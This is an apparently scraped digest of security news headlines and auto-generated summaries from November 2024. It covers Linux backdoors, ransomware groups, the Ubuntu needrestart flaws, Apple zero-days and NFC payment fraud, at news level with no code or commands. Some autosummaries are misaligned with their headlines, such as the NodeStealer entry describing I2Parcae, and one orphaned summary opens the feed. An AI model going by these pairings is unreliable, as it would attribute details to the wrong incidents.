    Autosummary: Source: BleepingComputer. These records allegedly contain the following information: full name, date of birth, gender, home address, phone number, email address, physician, prescriptions, and health card history. The data was offered for purchase to three users, and currently, no buyers have been declared on the sale listing.


    Deep Instinct delivers malware and ransomware prevention for cloud data stored in S3 buckets

    exploits ransomware
    2024-11-21 https://www.helpnetsecurity.com/2024/11/21/deep-instinct-dsx-for-cloud-amazon-s3/

    Deep Instinct launched Deep Instinct DSX for Cloud Amazon S3. As organizations increasingly rely on the cloud to power their digital transformation, businesses are generating and storing record amounts of data in the cloud. Cybercriminals know this and are leveraging generative AI to create sophisticated malware that evades existing security tools and takes advantage of the “assume breach” mindset. DSX for Cloud enables businesses to protect sensitive data across cloud storage environments by preventing and … More

    The post Deep Instinct delivers malware and ransomware prevention for cloud data stored in S3 buckets appeared first on Help Net Security.




    Ukrainian cyberwar experience becomes blueprint for TRYZUB cyber training service

    ciber
    2024-11-21 https://www.helpnetsecurity.com/2024/11/21/ukrainian-cyberwar-tryzub-cyber-training-service/

    The Computer Emergency Response Team of Ukraine (CERT-UA), part of the State Service of Special Communications and Information Protection (SSSCIP), has joined forces with the simulation training platform Cyber Ranges to unveil TRYZUB, a cyber resilience training and capability development service. TRYZUB primarily protects military, government entities, and critical infrastructure sectors such as energy, healthcare, finance, telecommunications, and education. Its training is designed for military units, law enforcement, government agencies, and operators of essential infrastructure … More

    "

    Autosummary: "


    NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

    exploits
    2024-11-21 https://thehackernews.com/2024/11/nodestealer-malware-targets-facebook-ad.html
    Threat hunters are warning about an updated version of the Python-based NodeStealer that's now equipped to extract more information from victims' Facebook Ads Manager accounts and harvest credit card data stored in web browsers. "They collect budget details of Facebook Ads Manager accounts of their victims, which might be a gateway for Facebook malvertisement," Netskope Threat Labs researcher "

    Autosummary: I2Parcae is "notable for having several unique tactics, techniques, and procedures (TTPs), such as Secure Email Gateway (SEG) evasion by proxying emails through legitimate infrastructure, fake CAPTCHAs, abusing hardcoded Windows functionality to hide dropped files, and C2 capabilities over Invisible Internet Project (I2P), a peer-to-peer anonymous network with end-to-end encryption," Cofense researcher Kahng An said. "When infected, I2Parcae is capable of disabling Windows Defender, enumerating Windows Security Accounts Manager (SAM) for accounts/groups, stealing browser cookies, and remote access to infected hosts. "


    Now BlueSky hit with crypto scams as it crosses 20 million users

    financial
    2024-11-21 https://www.bleepingcomputer.com/news/security/now-bluesky-hit-with-crypto-scams-as-it-crosses-20-million-users/
    As users are flocking to BlueSky from social media platforms like X/Twitter, so are threat actors. BleepingComputer has spotted cryptocurrency scams popping up on BlueSky just as the decentralized microblogging service surpassed 20 million users this week. [...] "

    Autosummary: A crypto scam on BlueSky featuring Meta branding (BleepingComputer) The MetaChain[.]cash website mentioned in the post also appears to carefully impersonate Meta branding, typeface, and messaging: MetaChain domain impersonates Meta branding (BleepingComputer) Another post titled "You've won FREE Satoshi Bitcoin of $900k" was seen leading users to a GitHub Pages website, cryptos-satoshi.github[.]io which is no longer accessible. A BlueSky post from last week featured an AI-generated image of Mark Zuckerberg and promoted crypto assets like "MetaChain" and "MetaCoin." As evident from the messaging and graphics, the post misleads viewers into associating the advertised products with tech giant Meta and its concept "Metaverse". "


    Researchers unearth two previously unknown Linux backdoors

    Linux
    2024-11-21 https://www.helpnetsecurity.com/2024/11/21/linux-backdoors-wolfsbane-firewood/

    ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. The goal of the backdoors and tools discovered is cyberespionage that targets sensitive data such as system information, user credentials, and specific files and directories. These tools are designed to maintain persistent access and execute commands stealthily, enabling prolonged intelligence gathering while evading detection. WolfsBane execution chain (Source: ESET) WolfsBane Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, … More

    "

    Autosummary: WolfsBane Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, the Philippines, and Singapore, likely originating from an incident response on a compromised server. "


    Over 145,000 Industrial Control Systems Across 175 Countries Found Exposed Online

    industry
    2024-11-21 https://thehackernews.com/2024/11/over-145000-industrial-control-systems.html
    New research has uncovered more than 145,000 internet-exposed Industrial Control Systems (ICS) across 175 countries, with the U.S. alone accounting for over one-third of the total exposures. The analysis, which comes from attack surface management company Censys, found that 38% of the devices are located in North America, 35.4% in Europe, 22.9% in Asia, 1.7% in Oceania, 1.2% in South America, "

    Autosummary: The countries with the most ICS service exposures include the U.S. (more than 48,000), Turkey, South Korea, Italy, Canada, Spain, China, Germany, France, the U.K., Japan, Sweden, Taiwan, Poland, and Lithuania. The majority of exposed HMIs are located in the U.S., followed by Germany, Canada, France, Austria, Italy, the U.K., Australia, Spain, and Poland. "


    Microsoft disrupts ONNX phishing-as-a-service infrastructure

    financial
    2024-11-21 https://www.bleepingcomputer.com/news/security/microsoft-disrupts-onnx-phishing-as-a-service-infrastructure/
    Microsoft's Digital Crimes Unit (DCU) has seized 240 domains used by customers of ONNX, a phishing-as-a-service (PhaaS) platform, to target companies and individuals across the United States and worldwide since at least 2017. [...] "

    Autosummary: The attacks, also controlled via Telegram bots, came with built-in two-factor authentication (2FA) bypass mechanisms and most recently targeted financial firms' employees (at banks, credit union service providers, and private funding firms) using QR code phishing (also known as quishing) tactics. "


    750,000 patients’ medical records exposed after data breach at French hospital

    financial
    2024-11-21 https://www.tripwire.com/state-of-security/750000-patients-medical-records-exposed-after-data-breach-french-hospital
    A hacker calling themselves "nears" claims to have compromised the systems of multiple healthcare facilities across France, claiming to have gained access to the records of over 1.5 million people. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: "


    Chinese APT Gelsemium Targets Linux Systems with New WolfsBane Backdoor

    Linux
    2024-11-21 https://thehackernews.com/2024/11/chinese-apt-gelsemium-targets-linux.html
    The China-aligned advanced persistent threat (APT) actor known as Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane as part of cyber attacks likely targeting East and Southeast Asia. That's according to findings from cybersecurity firm ESET based on multiple Linux samples uploaded to the VirusTotal platform from Taiwan, the Philippines, and Singapore in March 2023. "

    Autosummary: "


    Chinese hackers target Linux with new WolfsBane malware

    exploits Linux
    2024-11-21 https://www.bleepingcomputer.com/news/security/chinese-gelsemium-hackers-use-new-wolfsbane-linux-malware/
    A new Linux backdoor called "WolfsBane" has been discovered, believed to be a port of Windows malware used by the Chinese "Gelsemium" hacking group. [...] "

    Autosummary: WolfsBane's execution flow Source: ESET Finally, a modified version of the BEURK userland rootkit is loaded via "/etc/ld.so.preload" for system-wide hooking to help hide processes, files, and network traffic related to WolfsBane's activities. "


    Over 2,000 Palo Alto firewalls hacked using recently patched bugs

    exploits
    2024-11-21 https://www.bleepingcomputer.com/news/security/over-2-000-palo-alto-firewalls-hacked-using-recently-patched-bugs/
    Hackers have already compromised thousands of Palo Alto Networks firewalls in attacks exploiting two recently patched zero-day vulnerabilities. [...] "

    Autosummary: "


    CISA says BianLian ransomware now focuses only on data theft

    exploits ransomware
    2024-11-21 https://www.bleepingcomputer.com/news/security/cisa-says-bianlian-ransomware-now-focuses-only-on-data-theft/
    The BianLian ransomware operation has shifted its tactics, becoming primarily a data theft extortion group, according to an updated advisory from the U.S. Cybersecurity & Infrastructure Security Agency, the FBI, and the Australian Cyber Security Centre. [...] "

    Autosummary: The advisory has also been updated with the ransomware gang's new techniques, tactics, and procedures: Targets Windows and ESXi infrastructure, possibly the ProxyShell exploit chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) for initial access. "


    Ransomhub ransomware gang claims the hack of Mexican government Legal Affairs Office

    exploits government ransomware
    2024-11-21 https://securityaffairs.com/171257/data-breach/mexico-suffers-ransomware-attack.html
    Mexico is investigating a ransomware attack targeting its legal affairs office, as confirmed by the president amidst growing cybersecurity concerns. Mexico’s president announced the government is investigating an alleged ransomware hack that targeted the administration’s legal affairs office. “Today they are going to send me a report on the supposed hacking.” President Claudia Sheinbaum said […] "

    Autosummary: Ransomhub ransomware gang claims the hack of Mexican government Legal Affairs Office (Pierluigi Paganini, November 21, 2024). Mexico is investigating a ransomware attack targeting its legal affairs office, as confirmed by the president amidst growing cybersecurity concerns. "


    Decade-old local privilege escalation bugs impact Ubuntu needrestart package

    exploits Linux
    2024-11-21 https://securityaffairs.com/171228/security/privilege-escalation-bugs-ubuntu-needrestart-package.html
    Decade-old flaws in the needrestart package in Ubuntu Server could allow local attackers to gain root privileges without user interaction. The Qualys Threat Research Unit (TRU) discovered five decade-old Local Privilege Escalation (LPE) vulnerabilities in the needrestart package that could allow a local attacker to gain root privileges without requiring user interaction. The needrestart […] "

    Autosummary: These are the descriptions for the flaws: CVE-2024-48990 (CVSS score: 7.8) – A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. "


    Brazil police formally accuse Bolsonaro of alleged coup plot

    latam
    2024-11-21 https://www.bbc.com/news/articles/c98e29yvl88o
    Former President Bolsonaro says he will mount a legal "fight" against the accusations. "

    Autosummary: "


    Cybersecurity jobs available right now: November 20, 2024

    ciber
    2024-11-20 https://www.helpnetsecurity.com/2024/11/20/cybersecurity-jobs-available-right-now-november-20-2024/

    Application Security Engineer ENOC | UAE | On-site – View job details As an Application Security Engineer, you will establish and maintain DLP policies to prevent unauthorized access, transmission, or disclosure of sensitive data, focusing on both on-premises and cloud environments. Design, implement, and manage CASB solutions to control and monitor access to cloud applications and safeguard data across cloud services. Application Security Engineer Intellias | Poland | Remote – View job details As an … More

    "

    Autosummary: L2 SOC Analyst Neuron Solutions | Malaysia | On-site – View job details As a L2 SOC Analyst, you will analyze security alerts, incidents, and anomalies from a variety of sources (network, endpoint, cloud, etc.), leveraging Azure Sentinel and other security platforms. Information Security Compliance Manager Sidetrade | France | Hybrid – View job details As an Information Security Compliance Manager, you will assist with the development, implementation, and maintenance of information security policies, procedures, and processes in alignment with ISO 27001, SOC 1 and 2, and PCI DSS requirements. Senior Security Engineer – SecOps Robinhood | Canada | On-site – View job details As a Senior Security Engineer – SecOps, you will build and maintain automation workflows to improve the efficiency, speed, and accuracy of our security operations, focusing on reducing manual work and enhancing incident response times. Senior Security Engineer, Software Supply Chain Security Amazon | USA | On-site – View job details As a Senior Security Engineer, Software Supply Chain Security, you will identify security issues and risks and develop mitigation plans. Cloud Security Lead Pollard Digital Solutions | Canada | Remote – View job details As a Cloud Security Lead, you will lead the development, implementation and management of cloud security policies, procedures and controls to protect our organization's data, systems and assets. "


    Five backup lessons learned from the UnitedHealth ransomware attack

    exploits ransomware
    2024-11-20 https://www.helpnetsecurity.com/2024/11/20/backup-strategies/

    The ransomware attack on UnitedHealth earlier this year is quickly becoming the healthcare industry’s version of Colonial Pipeline, prompting congressional testimony, lawmaker scrutiny and potential legislation.  Over the past few months, there have been two congressional hearings on the attack — one in the Senate, followed by one in the House — as well as calls from multiple senators for investigations into how the government responded to the incident, not to mention the criticism against UnitedHealth’s CISO, Steven Martin, … More

    "

    Autosummary: Auditing should include: multifactor authentication, immutability best practices, CISA #StopRansomware guidelines, dual authorization for critical changes, restricted administrative access, logging best practices, account lockout settings, backup isolation, NAS security guidelines, secure snapshots, encryption, adherence to NIST, ISO, NERC CIP, HIPAA and other standards, and more. Implementing these strategies and leveraging a security posture management tool ensures that backup systems remain secure, reliable, and resilient against evolving cyber threats. Some ransomware groups – BlackCat, Akira, Lockbit, Phobos, and Crypto, for example – have been bypassing production systems altogether, and going straight for the backups. "


    China-Backed Hackers Leverage SIGTRAN, GSM Protocols to Infiltrate Telecom Networks

    Telcos
    2024-11-20 https://thehackernews.com/2024/11/china-backed-hackers-leverage-sigtran.html
    A new China-linked cyber espionage group has been attributed to a series of targeted cyber attacks on telecommunications entities in South Asia and Africa since at least 2020 with the goal of enabling intelligence collection. Cybersecurity company CrowdStrike is tracking the adversary under the name Liminal Panda, describing it as possessing deep knowledge about telecommunications "

    Autosummary: Some of the custom tools in its arsenal are SIGTRANslator, CordScan, and PingPong, which come with the following capabilities: SIGTRANslator, a Linux ELF binary designed to send and receive data using SIGTRAN protocols; CordScan, a network-scanning and packet-capture utility containing built-in logic to fingerprint and retrieve data relating to common telecommunication protocols from infrastructure such as the Serving GPRS Support Node (SGSN) "


    Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities

    exploits
    2024-11-20 https://thehackernews.com/2024/11/apple-releases-urgent-updates-to-patch.html
    Apple has released security updates for iOS, iPadOS, macOS, visionOS, and its Safari web browser to address two zero-day flaws that have come under active exploitation in the wild. The flaws are listed below: CVE-2024-44308, a vulnerability in JavaScriptCore that could lead to arbitrary code execution when processing malicious web content; CVE-2024-44309, a cookie management vulnerability in "

    Autosummary: "


    Oracle Warns of Agile PLM Vulnerability Currently Under Active Exploitation

    exploits
    2024-11-20 https://thehackernews.com/2024/11/oracle-warns-of-agile-plm-vulnerability.html
    Oracle is warning that a high-severity security flaw impacting the Agile Product Lifecycle Management (PLM) Framework has been exploited in the wild. The vulnerability, tracked as CVE-2024-21287 (CVSS score: 7.5), could be exploited sans authentication to leak sensitive information. "This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network "

    Autosummary: "


    AI Granny Daisy takes up scammers’ time so they can’t bother you

    financial
    2024-11-20 https://www.malwarebytes.com/blog/news/2024/11/ai-granny-daisy-takes-up-scammers-time-so-they-cant-bother-you
    An Artificial Intelligence model called Daisy has been deployed to waste phone scammers' time so they can't defraud real people. "

    Autosummary: We asked Tammy Stewart, one of Malwarebytes’ researchers, who has made it a hobby to waste the time of phishers herself, and she was enthusiastic about the idea of having a “Daisy.” "


    Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308)

    exploits
    2024-11-20 https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/

    Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”. About CVE-2024-44309 and CVE-2024-44308 CVE-2024-44309 affects WebKit, the browser engine used in the Safari web browser and all iOS and iPadOS web browsers, and can be triggered when it’s made to process maliciously crafted web content. It can enable a cross site scripting (XSS) attack. CVE-2024-44308 affects JavaScriptCore – … More

    "

    Autosummary: "


    ArmorCode unifies application security with infrastructure vulnerability management

    exploits
    2024-11-20 https://www.helpnetsecurity.com/2024/11/20/armorcode-vulnerability-management/

    ArmorCode announced the growth of its ASPM Platform with the ability to unify AppSec and infrastructure vulnerability management. The continued innovation of Risk-Based Vulnerability Management (RBVM) in ArmorCode empowers security teams to address vulnerabilities across infrastructure, cloud, and applications with enhanced prioritization, automation, asset and remediation workflows, offering organizations a comprehensive approach to manage risk. ArmorCode delivers an independent governance layer that integrates findings from multiple scanning tools, including infrastructure and application security scanners into … More

    "

    Autosummary: Security teams face several critical challenges, including fragmented visibility across infrastructure and cloud assets, an overwhelming volume of vulnerabilities to address, ownership confusion over asset responsibilities, time-consuming manual processes that slow remediation, and more. "


    NHIs Are the Future of Cybersecurity: Meet NHIDR

    ciber
    2024-11-20 https://thehackernews.com/2024/11/nhis-are-future-of-cybersecurity-meet.html
    The frequency and sophistication of modern cyberattacks are surging, making it increasingly challenging for organizations to protect sensitive data and critical infrastructure. When attackers compromise a non-human identity (NHI), they can swiftly exploit it to move laterally across systems, identifying vulnerabilities and compromising additional NHIs in minutes. While organizations often take "

    Autosummary: With NHIDR, organizations can safeguard their assets, maintain compliance, and stay ahead of the threat landscape —because when it comes to protecting critical systems, proactive defense is essential. "


    Decades-Old Security Vulnerabilities Found in Ubuntu's Needrestart Package

    Linux
    2024-11-20 https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html
    Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user interaction. The Qualys Threat Research Unit (TRU), which identified and reported the flaws early last month, said they are trivial to exploit, necessitating that "

    Autosummary: The five flaws are listed below - CVE-2024-48990 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable; CVE-2024-48991 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter; CVE-2024-48992 (CVSS score: 7.8) - "


    Apple addressed two actively exploited zero-day vulnerabilities

    exploits
    2024-11-20 https://securityaffairs.com/171202/uncategorized/apple-fixed-2-actively-exploited-zero-day-bugs.html
    Apple released security updates for iOS, iPadOS, macOS, visionOS, and Safari browser to address two actively exploited zero-day flaws. Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, macOS, visionOS, and Safari web browser, which are actively exploited in the wild. The vulnerability CVE-2024-44309 is a cookie management issue […] "

    Autosummary: iOS 17.7.2 and iPadOS 17.7.2 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later. "


    New Ghost Tap attack abuses NFC mobile payments to steal money

    financial
    2024-11-20 https://www.bleepingcomputer.com/news/security/new-ghost-tap-attack-abuses-nfc-mobile-payments-to-steal-money/
    Cybercriminals have devised a novel method to cash out from stolen credit card details linked to mobile payment systems such as Apple Pay and Google Pay, dubbed "Ghost Tap," which relays NFC card data to money mules worldwide. [...] "

    Autosummary: "The new tactic for cash-outs poses a challenge for financial organisations: the ability of cybercriminals to scale the fraudulent offline purchases, making multiple small payments in different places, might not trigger the anti-fraud mechanisms and might allow cybercriminals to successfully buy goods that can be further re-sold (like gift cards)," explains ThreatFabric. "


    “Sad announcement” email leads to tech support scam

    financial
    2024-11-20 https://www.malwarebytes.com/blog/news/2024/11/sad-announcement-email-leads-to-tech-support-scam
    People are receiving disturbing emails that appear to imply something has happened to their friend or family member. "

    Autosummary: Here are some examples: “When you open them you will see why I actually wanted to share them with you today”; “Never thought I would want to share these images with you, anyways here they are”; “I’m presuming you should remember these two ladies, in that photo”; “When I was looking through some old folders I found these 3 pics”; “it wasn’t initially my plan, but I had to change my mind about it”; “Two pictures that I wanted to share with you.” If in doubt, contact your friend via another, trusted method. If your browser or mobile device “locks up”, meaning you’re no longer able to navigate away from a virus warning, you’re likely looking at a tech support scam. To close the emails off, the scammers end with a quote in the format: “You do not find the happy life. How to avoid the “sad announcement” scam: Always compare the actual sender address with the email address this person would normally use to send you an email. "


    Update now! Apple confirms vulnerabilities are already being exploited

    exploits
    2024-11-20 https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
    Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild. "

    Autosummary: Apple has released security patches for most of its operating systems, including iOS, Mac, iPadOS, Safari, and visionOS. "


    Oracle Linux 9 Update 5 brings security updates, OpenJDK 17, .NET 9.0

    Linux
    2024-11-20 https://www.helpnetsecurity.com/2024/11/20/oracle-linux-9-update-5/

    Oracle Linux offers a secure, streamlined platform for deploying and managing applications across on-premises, cloud, and edge environments. Designed for demanding workloads, it includes tools for automation, virtualization, high availability, cloud-native development, Kubernetes, and more. Oracle Linux 9 Update 5 for the 64-bit Intel and AMD (x86_64) and 64-bit Arm (aarch64) platforms is now generally available. This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for … More

    "

    Autosummary: This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for the x86_64 and aarch64 platforms Red Hat Compatible Kernel (RHCK), 5.14.0-503.11.1 for the x86_64 platform Security OpenSSL updated to version 3.2.2 – This significant update includes enhanced cryptographic operations and optimized RSA public key handling. "


    Quantum DXi9200 helps organizations manage and reduce cybersecurity risks

    ciber
    2024-11-20 https://www.helpnetsecurity.com/2024/11/20/quantum-dxi9200/

    Quantum announces the DXi9200, the latest generation of its flagship DXi9000 Series hybrid (flash + dense disk) data protection appliances, designed for scalable, efficient backup and recovery services for large organizations. With the continuing threat of ransomware attacks, organizations need to take a comprehensive and proactive approach to secure their data and data copies, continuously validate recovery operations, and quickly recover in case of attack. As the industry’s most scalable, feature-rich, and efficient data protection … More

    "

    Autosummary: Backup data integrity against alteration, deletion or corruption with offline immutable snapshot data copies, frequent native data integrity health checks, parity-protected RAID, and a compatible ecosystem of data protection and malware scanning software, including Veeam, Veritas, and Commvault. "


    Ghost Tap: Hackers Exploiting NFCGate to Steal Funds via Mobile Payments

    exploits
    2024-11-20 https://thehackernews.com/2024/11/ghost-tap-hackers-exploiting-nfcgate-to.html
    Threat actors are increasingly banking on a new technique that leverages near-field communication (NFC) to cash out victims' funds at scale. The technique, codenamed Ghost Tap by ThreatFabric, enables cybercriminals to cash out money from stolen credit cards linked to mobile payment services such as Google Pay or Apple Pay by relaying NFC traffic. "Criminals can now misuse Google Pay and Apple "

    Autosummary: "We suspect that the evolution of networks with increasing speed of communication together with a lack of proper time-based detection on ATM/POS terminals made these attacks possible, where the actual devices with cards are physically located far away from the place where transaction is performed (device is not present at PoS or ATM)," ThreatFabric noted. "


    Fintech giant Finastra investigates data breach after SFTP hack

    financial
    2024-11-20 https://www.bleepingcomputer.com/news/security/fintech-giant-finastra-investigates-data-breach-after-sftp-hack/
    Finastra has confirmed it warned customers of a cybersecurity incident after a threat actor began selling allegedly stolen data on a hacking forum. [...] "

    Autosummary: The firm's software services include lending solutions, payment processing, cloud-enabled retail and banking platforms, and trading risk management tools. "


    Ubuntu Linux impacted by decade-old "needrestart" flaw that gives root

    Linux
    2024-11-20 https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/
    Five local privilege escalation (LPE) vulnerabilities have been discovered in the needrestart utility used by Ubuntu Linux, which was introduced over 10 years ago in version 21.04. [...] "

    Autosummary: The flaws were discovered by Qualys and are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. Needrestart is a utility commonly used on Linux, including on Ubuntu Server, to identify services that require a restart after package updates, ensuring that those services run the most up-to-date versions of shared libraries. "


    Ford data breach involved a third-party supplier

    financial
    2024-11-20 https://securityaffairs.com/171217/breaking-news/ford-admits-data-breach-linked-third-party-supplier.html
    Ford investigated a data breach linked to a third-party supplier and pointed out that its systems and customer data were not compromised. Ford investigated the data breach after threat actors claimed the theft of customer information on the BreachForums cybercrime forum. On November 17, threat actors IntelBroker and EnergyWeaponUser published a post on BreachForums […] "

    Autosummary: "


    Apple addressed two actively exploited zero-day vulnerabilities

    exploits
    2024-11-20 https://securityaffairs.com/171202/security/apple-fixed-2-actively-exploited-zero-day-bugs.html
    Apple released security updates for iOS, iPadOS, macOS, visionOS, and Safari browser to address two actively exploited zero-day flaws. Apple released security updates for two zero-day vulnerabilities, tracked as CVE-2024-44309 and CVE-2024-44308, in iOS, iPadOS, macOS, visionOS, and Safari web browser, which are actively exploited in the wild. The vulnerability CVE-2024-44309 is a cookie management issue […] "

    Autosummary: iOS 17.7.2 and iPadOS 17.7.2 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later.


    Dev + Sec: A collaborative approach to cybersecurity

    ciber
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/dev-sec-collaborative-approach/

    The age-old tension between development and security teams has long been a source of friction in organizations. Developers prioritize speed and efficiency, aiming to deliver features and products quickly in a fast-paced, iterative development cycle and move on. Security teams, on the other hand, strive to balance risk and innovation but must focus on protecting sensitive data and systems with guardrails and on ensuring compliance with stringent regulations. These contrasting priorities and communication gaps lead … More

    The post Dev + Sec: A collaborative approach to cybersecurity appeared first on Help Net Security.


    Autosummary: An organization in which developers and security view their goals as contradictory or, even worse, cease to collaborate altogether, may contend with delayed releases, system downtime and increased costs, not to mention an acrimonious working environment, decreased morale and growing security risks. Using tools that are designed for developers, not only for security professionals, makes security an inherent part of the developer's workflow rather than an external (and annoying) afterthought.


    Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign

    exploits Telcos
    2024-11-19 https://thehackernews.com/2024/11/chinese-hackers-exploit-t-mobile-and.html
    U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information. The adversaries, tracked as Salt Typhoon, breached the company as part of a "monthslong campaign" designed to harvest cellphone communications of "high-value intelligence targets." It's not clear what information was taken, if any,

    Autosummary: The second infection sequence, in contrast, is a lot more sophisticated, with the threat actors abusing susceptible Microsoft Exchange servers to implant the China Chopper web shell, which is then used to deliver Cobalt Strike, Zingdoor, and Snappybee (aka Deed RAT), a suspected successor to the ShadowPad malware. In August 2023, the spy crew was linked to a series of attacks aimed at government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. Analysis shows that the threat actors have methodically crafted their payloads and made use of an interesting combination of legitimate and bespoke tools and techniques to bypass defenses and maintain access to their targets.


    Warning: VMware vCenter and Kemp LoadMaster Flaws Under Active Exploitation

    exploits
    2024-11-19 https://thehackernews.com/2024/11/cisa-alert-active-exploitation-of.html
    Now-patched security flaws impacting Progress Kemp LoadMaster and VMware vCenter Server have come under active exploitation in the wild, it has emerged. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added CVE-2024-1212 (CVSS score: 10.0), a maximum-severity security vulnerability in Progress Kemp LoadMaster, to its Known Exploited Vulnerabilities (KEV) catalog. It was



    Malware delivered via malicious QR codes sent in the post

    exploits
    2024-11-19 https://www.bitdefender.com/en-us/blog/hotforsecurity/malware-malicious-qr-codes-the-post
    Cybercriminals have adopted a novel trick for infecting devices with malware: sending out physical letters that contain malicious QR codes. Read more in my article on the Hot for Security blog.

    Autosummary: Smartphone users would be wise to be on their guard, ensuring that their devices are up-to-date with security patches, are running anti-virus protection, and to only install apps from official app stores.


    Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287)

    exploits
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/cve-2024-21287/

    Oracle has released a security patch for CVE-2024-21287, a remotely exploitable vulnerability in the Oracle Agile PLM Framework that is, according to Tenable researchers, being actively exploited by attackers. About CVE-2024-21287 Oracle Agile PLM Framework is an enterprise product lifecycle management solution that enables collaboration between the various teams involved. CVE-2024-21287 affects version 9.3.6 of the Agile PLM Framework – more specifically, the Agile Software Development Kit and the Process Extension components. “This vulnerability is … More



    Phobos ransomware administrator faces US cybercrime charges

    exploits ransomware
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/phobos-ransomware-cybercrime-charges/

    The Justice Department unsealed criminal charges against Evgenii Ptitsyn, 42, a Russian national, for allegedly administering the sale, distribution, and operation of Phobos ransomware. Ptitsyn made his initial appearance in the US District Court for the District of Maryland on Nov. 4 after being extradited from South Korea. Phobos ransomware, through its affiliates, victimized more than 1,000 public and private entities in the United States and around the world, and extorted ransom payments worth more … More


    Autosummary: Ptitsyn is charged in a 13-count indictment with wire fraud conspiracy, wire fraud, conspiracy to commit computer fraud and abuse, four counts of causing intentional damage to protected computers, and four counts of extortion in relation to hacking.


    AlmaLinux 9.5 released: Security updates, new packages, and more!

    Linux
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/almalinux-9-5-teal-serval-released/

    AlmaLinux is a free, open-source, enterprise-grade Linux distribution. Governed and owned by the community, it offers a production-ready platform with binary compatibility to Red Hat Enterprise Linux. AlmaLinux 9.5, codenamed Teal Serval, is now available. Security updates: The OpenSSL TLS toolkit is upgraded to version 3.2.2. OpenSSL now supports certificate compression extension (RFC 8879) and Brainpool curves have been added to the TLS 1.3 protocol (RFC 8734). The SELinux policy now provides a boolean that … More



    New "Helldown" Ransomware Variant Expands Attacks to VMware and Linux Systems

    exploits ransomware Linux
    2024-11-19 https://thehackernews.com/2024/11/new-helldown-ransomware-expands-attacks.html
    Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus. "Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia said in a report shared with The Hacker News. "Given the recent development of ransomware targeting ESX, it appears that the group

    Autosummary: Truesec, in an analysis published earlier this month, detailed Helldown attack chains that have been observed making use of internet-facing Zyxel firewalls to obtain initial access, followed by carrying out persistence, credential harvesting, network enumeration, defense evasion, and lateral movement activities to ultimately deploy the ransomware. Interlock is assessed to be a new group that sprang forth from Rhysida operators or developers, the company added, citing overlaps in tradecraft, tools, and ransomware behavior.


    Microsoft launches Zero Day Quest hacking event with $4 million in rewards

    exploits
    2024-11-19 https://www.bleepingcomputer.com/news/microsoft/microsoft-launches-zero-day-quest-hacking-event-with-4-million-in-rewards/
    Microsoft announced today at its Ignite annual conference in Chicago, Illinois, that it's expanding its bug bounty programs with Zero Day Quest, a new hacking event focusing on cloud and AI products and platforms. [...]



    Hornetsecurity DMARC Manager protects against fraud and phishing attacks

    financial
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/hornetsecurity-dmarc-manager/

    Hornetsecurity launched DMARC Manager, an advanced tool that addresses the complex challenges organisations face in managing DMARC, DKIM, and SPF configurations, especially for those operating across multiple domains. As email threats such as fraud and impersonation attacks continue to rise, the need for robust email authentication practices has never been more critical. DMARC Manager is designed to empower administrators and CISOs by providing an intuitive solution for setting up and maintaining best practices in email authentication. … More


    Autosummary: To help prevent fraud, impersonation and phishing attacks, DMARC Manager also identifies suspicious activities, such as unauthorised email traffic being sent in the name of the user’s domains.
